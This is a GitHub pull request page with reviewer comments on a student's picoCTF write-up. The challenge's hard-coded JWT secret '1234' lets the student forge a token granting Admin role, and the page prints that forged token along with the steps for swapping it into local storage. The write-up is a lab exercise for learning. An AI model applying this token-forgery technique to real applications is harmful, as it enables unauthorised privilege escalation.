Report 6 - Flora - picoCTF Java Code Analysis!?!#92
Open
florayq wants to merge 6 commits intoCUCTF:mainfrom
Open
Report 6 - Flora - picoCTF Java Code Analysis!?!#92florayq wants to merge 6 commits intoCUCTF:mainfrom
florayq wants to merge 6 commits intoCUCTF:mainfrom
Conversation
mmstoic
suggested changes
May 1, 2026
Contributor
mmstoic
left a comment
mmstoic
left a comment
There was a problem hiding this comment.
Overall great writeup! Just address the comments and you'll be good!
| ## Context & Vulnerability | ||
| This code creates an extensive reading application where a user can read pdfs/books that they are given the jurisdiction to access. According to the challenge description, we need to read the 'Flag' book which is only accessible by a user with admin authority whereas the user account provided to us only has the free tier authority. | ||
|
|
||
| In the security folder of the challenge, specifically SecretGenerator.java, we following code: |
Contributor
There was a problem hiding this comment.
we HAVE the following code:
| return "1234"; | ||
| } | ||
| ``` | ||
| This is clearly a security concern as JWT (JSON Web Tokens) depends on this generateRandomString function for its secret key. |
Contributor
There was a problem hiding this comment.
Why are we concerned about secret keys? Why are we talking about JWT? Explain the relevance to the challenge context!
| This is clearly a security concern as JWT (JSON Web Tokens) depends on this generateRandomString function for its secret key. | ||
|
|
||
| ## Exploitation | ||
| JWT's auth-token and token-payload can be found in Applications > Local Storage through the Inspect tool. Using the website jwt.io (JWT Debugger), one can decode this string: |
Contributor
There was a problem hiding this comment.
An image of this could be nice!
|
|
||
| eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiQWRtaW4iLCJpc3MiOiJib29rc2hlbGYiLCJleHAiOjE3NzgwMjIwNjksImlhdCI6MTc3NzQxNzI2OSwidXNlcklkIjoyLCJlbWFpbCI6InVzZXIifQ.fh9qdjkyYO50o_Vfri7LsvdhSvSuqpOF9NEd5W5Ouyc | ||
|
|
||
| we can replace the previous auth-token and token-payload. |
Contributor
There was a problem hiding this comment.
Maybe an image of how you replaced the value?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Flora's sixth writeup - web challenge from picoCTF